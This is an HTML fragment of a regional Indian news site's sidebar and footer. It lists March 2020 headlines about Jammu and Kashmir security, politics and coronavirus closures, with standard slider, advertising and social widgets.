			    <h4><a href="http://news.statetimes.in/two-terrorist-hideouts-busted-in-kashmir/">Two terrorist hideouts busted in Kashmir</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:36:38+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/no-period-in-jk-during-terrorism-as-peaceful-as-it-is-dr-jitendra/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/DR-JITINDRA.jpg&h=60&w=90" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/DR-JITINDRA.jpg&h=60&w=90" alt="No period in J&K during terrorism as peaceful as it is: Dr Jitendra" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/no-period-in-jk-during-terrorism-as-peaceful-as-it-is-dr-jitendra/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/DR-JITINDRA.jpg&h=120&w=180" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/DR-JITINDRA.jpg&h=120&w=180" alt="No period in J&K during terrorism as peaceful as it is: Dr Jitendra" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/no-period-in-jk-during-terrorism-as-peaceful-as-it-is-dr-jitendra/">No period in J&#038;K during terrorism as peaceful as it is: Dr Jitendra</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:36:25+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/govt-issues-gazette-notification-for-adaptation-of-37-central-laws-in-jk/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Govt issues gazette notification for adaptation of 37 central laws in J&K" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/govt-issues-gazette-notification-for-adaptation-of-37-central-laws-in-jk/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Govt issues gazette notification for adaptation of 37 central laws in J&K" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/govt-issues-gazette-notification-for-adaptation-of-37-central-laws-in-jk/">Govt issues gazette notification for adaptation of 37 central laws in J&#038;K</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:34:57+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/axe-falls-on-land-encroachers-in-sunjwan-illegal-entries-of-nearly-5000-kanals-forest-land-expunged/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Axe falls on land encroachers in Sunjwan; illegal entries of nearly 5,000 kanals forest land expunged" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/axe-falls-on-land-encroachers-in-sunjwan-illegal-entries-of-nearly-5000-kanals-forest-land-expunged/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Axe falls on land encroachers in Sunjwan; illegal entries of nearly 5,000 kanals forest land expunged" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/axe-falls-on-land-encroachers-in-sunjwan-illegal-entries-of-nearly-5000-kanals-forest-land-expunged/">Axe falls on land encroachers in Sunjwan; illegal entries of nearly 5,000 kanals forest land expunged</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:34:10+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/corruption-ended-in-jk-post-art-370-abrogation-sitharaman/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Corruption ended in J&K post-Art 370 abrogation: Sitharaman" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/corruption-ended-in-jk-post-art-370-abrogation-sitharaman/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Corruption ended in J&K post-Art 370 abrogation: Sitharaman" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/corruption-ended-in-jk-post-art-370-abrogation-sitharaman/">Corruption ended in J&#038;K post-Art 370 abrogation: Sitharaman</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:34:00+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/pak-shells-forward-areas-along-loc-2/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2015/09/FInal-ceasefire.jpg&h=60&w=90" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2015/09/FInal-ceasefire.jpg&h=60&w=90" alt="Pak shells forward areas along LoC" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/pak-shells-forward-areas-along-loc-2/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2015/09/FInal-ceasefire.jpg&h=120&w=180" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2015/09/FInal-ceasefire.jpg&h=120&w=180" alt="Pak shells forward areas along LoC" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/pak-shells-forward-areas-along-loc-2/">Pak shells forward areas along LoC</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:33:53+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/first-coronavirus-case-reported-in-kashmir-army-reports-its-first-case-in-ladakh/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="First coronavirus case reported in Kashmir;  army reports its first case in Ladakh" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/first-coronavirus-case-reported-in-kashmir-army-reports-its-first-case-in-ladakh/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="First coronavirus case reported in Kashmir;  army reports its first case in Ladakh" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/first-coronavirus-case-reported-in-kashmir-army-reports-its-first-case-in-ladakh/">First coronavirus case reported in Kashmir;  army reports its first case in Ladakh</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:32:44+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/foreign-tourists-who-arrived-in-srinagar-on-wednesday-being-sent-back-today/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="‘Foreign tourists who arrived in Srinagar on Wednesday being sent back today’" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/foreign-tourists-who-arrived-in-srinagar-on-wednesday-being-sent-back-today/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="‘Foreign tourists who arrived in Srinagar on Wednesday being sent back today’" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/foreign-tourists-who-arrived-in-srinagar-on-wednesday-being-sent-back-today/">‘Foreign tourists who arrived in Srinagar on Wednesday being sent back today’</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:32:42+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/vaishno-devi-yatra-suspended/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Vaishno Devi Yatra suspended" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/vaishno-devi-yatra-suspended/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Vaishno Devi Yatra suspended" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/vaishno-devi-yatra-suspended/">Vaishno Devi Yatra suspended</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:32:36+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/all-jk-bose-exams-postponed/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="ALL J&K BOSE EXAMS POSTPONED" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/all-jk-bose-exams-postponed/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x28364" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="ALL J&K BOSE EXAMS POSTPONED" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/all-jk-bose-exams-postponed/">ALL J&#038;K BOSE EXAMS POSTPONED</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:32:34+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="http://news.statetimes.in/bhatnagar-dgp-review-security-scenario-for-amarnath-yatra/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%2090%2060'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Advisor-B-DGP-Chairs-high-level-meet-1.jpg&h=60&w=90" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Advisor-B-DGP-Chairs-high-level-meet-1.jpg&h=60&w=90" alt="Bhatnagar, DGP review security scenario for Amarnath Yatra" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="http://news.statetimes.in/bhatnagar-dgp-review-security-scenario-for-amarnath-yatra/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20180%20120'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Advisor-B-DGP-Chairs-high-level-meet-1.jpg&h=120&w=180" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Advisor-B-DGP-Chairs-high-level-meet-1.jpg&h=120&w=180" alt="Bhatnagar, DGP review security scenario for Amarnath Yatra" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="http://news.statetimes.in/bhatnagar-dgp-review-security-scenario-for-amarnath-yatra/">Bhatnagar, DGP review security scenario for Amarnath Yatra</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-03-19T01:32:25+05:30" class="entry-date">March 19, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

									                                    </div>
</div><div class="tab-content"><a href="#" class="mom-tw-title">Cities n Towns</a>		<ul>
		
			<li><a href="http://news.statetimes.in/teaching-staff-of-udhampur-rajouri-allowed-remaining-off-duty/">Teaching staff of Udhampur, Rajouri allowed remaining off duty</a></li>

			
			<li><a href="http://news.statetimes.in/pak-shells-forward-areas-along-loc-2/">Pak shells forward areas along LoC</a></li>

			
			<li><a href="http://news.statetimes.in/vaishno-devi-yatra-suspended/">Vaishno Devi Yatra suspended</a></li>

			
			<li><a href="http://news.statetimes.in/drug-peddler-arrested-17-rolls-of-charas-seized/">Drug peddler arrested, 17 rolls of Charas seized</a></li>

			
			<li><a href="http://news.statetimes.in/13-bovines-rescued-smugglers-flee-2/">13 bovines rescued, smugglers flee</a></li>

			
			<li><a href="http://news.statetimes.in/udhampur-police-recovers-missing-girl/">Udhampur Police recovers missing girl</a></li>

			
			<li><a href="http://news.statetimes.in/absconder-nabbed-after-5-years-2/">Absconder nabbed after 5 years</a></li>

			
			<li><a href="http://news.statetimes.in/dm-rajouri-suspends-all-modes-of-public-transport/">DM Rajouri suspends all modes of public transport</a></li>

			
			<li><a href="http://news.statetimes.in/advisor-baseer-iocl-team-meet-lt-governor/">Advisor Baseer, IOCL team meet Lt Governor</a></li>

			
			<li><a href="http://news.statetimes.in/smvdu-faculty-delivers-lecture-at-pittsburgh-conference/">SMVDU faculty delivers lecture at Pittsburgh Conference</a></li>

			
			<li><a href="http://news.statetimes.in/ashwani-hails-pm-for-over-rs-1-lakh-crore-budget-to-jk/">Ashwani hails PM for over Rs 1 lakh crore budget to J&#038;K</a></li>

			
			<li><a href="http://news.statetimes.in/dlsa-launches-awareness-campaign-on-coronavirus/">DLSA launches awareness campaign on coronavirus</a></li>

			
			<li><a href="http://news.statetimes.in/cong-criticises-revenue-authorities-for-harassment-of-farmers/">Cong criticises revenue authorities for harassment of farmers</a></li>

			
			<li><a href="http://news.statetimes.in/entrepreneur-tastes-success-with-beekeeping-in-kathua/">‘Entrepreneur tastes success with beekeeping in Kathua’</a></li>

			
			<li><a href="http://news.statetimes.in/three-arrested-with-345-kg-poppy-straw/">Three arrested with 345 kg poppy straw</a></li>

			
			<li><a href="http://news.statetimes.in/diet-poonch-launches-door-to-door-campaign-against-coronavirus/">DIET Poonch launches door to door campaign against coronavirus</a></li>

											</ul>
</div>                            </div>
                        </div> <!--main tabs-->

            </div><div class="widget momizat-posts_slider"><div class="widget-head"><h3 class="widget-title"><span>Entertainment n Lifestyle</span></h3></div>			<script>
			jQuery(document).ready(function ($) {
				jQuery('.mpsw-slider').flexslider({
					animation : 'slide',
					controlNav: false,
					smoothHeight: true,
					prevText: '',
					nextText: '',
					slideshow: 1,
					slideshowSpeed: 4000,
				});
			});
			</script>
			<div class="mom-posts-slide-widget type-">
                            <div class="mpsw-slider">
                              <ul class="slides">
											<li>
			<a href="http://news.statetimes.in/richa-chadha-ali-fazals-wedding-delayed-amid-coronavirus-scare/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20265%20168'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare.jpg&h=168&w=265" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Richa-Chadha-Ali-Fazals-wedding-delayed-amid-coronavirus-scare.jpg&h=168&w=265" alt="Richa Chadha-Ali Fazal's wedding delayed amid coronavirus scare" width="265" height="168">			  <p class="slide-caption">Richa Chadha-Ali Fazal&#8217;s wedding delayed amid coronavirus scare</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/amitabh-bachchan-cancels-sunday-meet-amid-coronavirus-outbreak/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20265%20168'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2017/03/Amitabh-Bachchan-bats-for-gender-equality.jpg&h=168&w=265" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2017/03/Amitabh-Bachchan-bats-for-gender-equality.jpg&h=168&w=265" alt="Amitabh Bachchan cancels Sunday meet amid coronavirus outbreak" width="265" height="168">			  <p class="slide-caption">Amitabh Bachchan cancels Sunday meet amid coronavirus outbreak</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/tom-hanks-says-he-and-wife-rita-wilson-have-tested-positive-for-coronavirus/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20265%20168'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Tom-Hanks-says-he-and-wife-Rita-Wilson-have-tested-positive-for-coronavirus.jpg&h=168&w=265" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Tom-Hanks-says-he-and-wife-Rita-Wilson-have-tested-positive-for-coronavirus.jpg&h=168&w=265" alt="Tom Hanks says he and wife Rita Wilson have tested positive for coronavirus" width="265" height="168">			  <p class="slide-caption">Tom Hanks says he and wife Rita Wilson have tested positive for coronavirus</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/important-for-films-like-ghar-ki-murgi-panga-to-connect-more-with-male-audience-nitesh/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20265%20168'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/nitish-tiwari.jpg&h=168&w=265" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/nitish-tiwari.jpg&h=168&w=265" alt="Important for films like 'Ghar Ki Murgi', 'Panga' to connect more with male audience: Nitesh" width="265" height="168">			  <p class="slide-caption">Important for films like &#8216;Ghar Ki Murgi&#8217;, &#8216;Panga&#8217; to connect more with male audience: Nitesh</p>
			  </a>
			</li>
																		<li>
			<a href="http://news.statetimes.in/self-perception-of-risk-is-vastly-underestimated-in-women-dr-sushil/"><img class="lazy" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20265%20168'%3E%3C/svg%3E" data-src="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Dr-Sushil-1.jpg&h=168&w=265" data-hidpi="http://news.statetimes.in/wp-content/themes/goodnews5/framework/timthumb/timthumb.php?src=http://news.statetimes.in/wp-content/uploads/2020/03/Dr-Sushil-1.jpg&h=168&w=265" alt="Self perception of risk is vastly  underestimated in women: Dr Sushil" width="265" height="168">			  <p class="slide-caption">Self perception of risk is vastly  underestimated in women: Dr Sushil</p>
			  </a>
			</li>
															                              </ul>
                            </div>
                        </div>

</div>
           </div> <!--main sidebar-->
            <div class="clear"></div>                      </div> <!--main inner-->
            
		<div class="mom-e3lanat-wrap responsive footer_top_banner">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="4680" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- horizon large -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="5307315016"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
      </div> <!--content boxed wrapper-->
                        <footer id="footer">
                <div class="inner">
	     			<div class="one_fourth">
		<div class="widget momizat-social_counter"><div class="widget-head"><h3 class="widget-title"><span>Socials Counter</span></h3></div>
                        <div class="mom-socials-counter">
                            <ul>
                                                                    <li class="msc-item msc-rss">
                                        <a href="http://news.statetimes.in/feed/"><div class="sc-head">
                                            <i class="fa-icon-rss"></i>
                                            <span>RSS</span>
                                        </div>
                                        </a>
                                        <div class="sc-count">
                                            <span>1000+</span>
                                            Subscribers                                        </div>
                                    </li>
                                
                                
                                                                <li class="msc-item msc-twitter">
                                    <a href="http://twitter.com/@state_times" target="_blank">
                                    <div class="sc-head">
                                        <i class="fa-icon-twitter"></i>
                                        <span>twitter</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>1584</span>
                                        followers                                    </div>
                                </li>
                                
                                                                <li class="msc-item msc-googlePlus">
                                    <a href=""  target="_blank">
                                        <div class="sc-head">
                                        <i class="fa-icon-google-plus"></i>
                                        <span>google+</span>
                                    </div>
                                    </a>
                                    <div class="sc-count">
                                        <span>0</span>
                                        followers                                    </div>
                                </li>
                                
                                
                                
                                
                                
                                
                                
				
                                                            </ul>
                        </div>
</div>			</div>
			<div class="one_fourth">
		<div class="widget momizat-facebook"><div class="widget-head"><h3 class="widget-title"><span>State Times on Facebook</span></h3></div>                <div class="mom_facebook_likebox" style="background:#fff;border:1px solid #e5e5e5;">
<iframe src="//www.facebook.com/plugins/likebox.php?href=http://www.facebook.com/statetimes&amp;width=263&amp;height=290&amp;colorscheme=light&amp;show_faces=true&amp;show_border=false&amp;stream=false&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:263px; height:290px;" allowTransparency="true"></iframe>

</div><!--like_box_footer-->

</div>			</div>
			<div class="one_fourth">
			        			</div>
			<div class="one_fourth last">
		<div class="widget momizat-recent_comments"><div class="widget-head"><h3 class="widget-title"><span>Recent Comments</span></h3></div>  <div class="mom-recent-comments">
                            <ul>
                                <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/shun-politics-come-forward-to-contribute-for-needy-parvez/#comment-8561" title="Natalie Hardess's answer to What is the origin of the Joker? - Quora on Shun politics, come forward to contribute for needy: Parvez"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/shun-politics-come-forward-to-contribute-for-needy-parvez/#comment-8561" title="Natalie Hardess's answer to What is the origin of the Joker? - Quora on Shun politics, come forward to contribute for needy: Parvez">Natalie Hardess's answer to What is the origin of the Joker? - Quora</a> <time>on 11 Jun </time><span class="rc-post">in: <a href="http://news.statetimes.in/shun-politics-come-forward-to-contribute-for-needy-parvez/">Shun politics, come forward to contribute for needy: Parvez</a></span></h4>
                                    <p>I seldom write comments, but after reding through a ton of remarks onn ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/shun-politics-come-forward-to-contribute-for-needy-parvez/#comment-8561" title="Natalie Hardess's answer to What is the origin of the Joker? - Quora on Shun politics, come forward to contribute for needy: Parvez">Read more</a>
 -->                                    </div>
                                </li>
                                                          <li>
                                    <div class="author_avatar border-box">
                                        <a href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/#comment-7934" title="Sreekumar Prabhakaran on MR ARNAB GOSWAMI, WHO IS SHAMELESS?"></a>
                                    </div>
                                    <div class="author_comment">
                                    <h4><a href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/#comment-7934" title="Sreekumar Prabhakaran on MR ARNAB GOSWAMI, WHO IS SHAMELESS?">Sreekumar Prabhakaran</a> <time>on 10 May </time><span class="rc-post">in: <a href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/">MR ARNAB GOSWAMI, WHO IS SHAMELESS?</a></span></h4>
                                    <p>Arnab traded journalism for personal and pecuniary rewards. He will no ... </p>
<!--                         <a class="read-more-link" href="http://news.statetimes.in/mr-arnab-goswami-who-is-shameless/#comment-7934" title="Sreekumar Prabhakaran on MR ARNAB GOSWAMI, WHO IS SHAMELESS?">Read more</a>
 -->                                    </div>
                                </li>
                          
                            </ul>
        </div>
</div>			</div>
	    
        <div class="clear"></div>
                </div> <!--// footer inner-->
            </footer> <!--//footer-->
            <div class="copyrights-area">
                <div class="inner">
                    <p class="copyrights-text">© 2020 <a href="#">State Times Daily Newspaper</a></p>
                        <ul class="mom-social-icons">
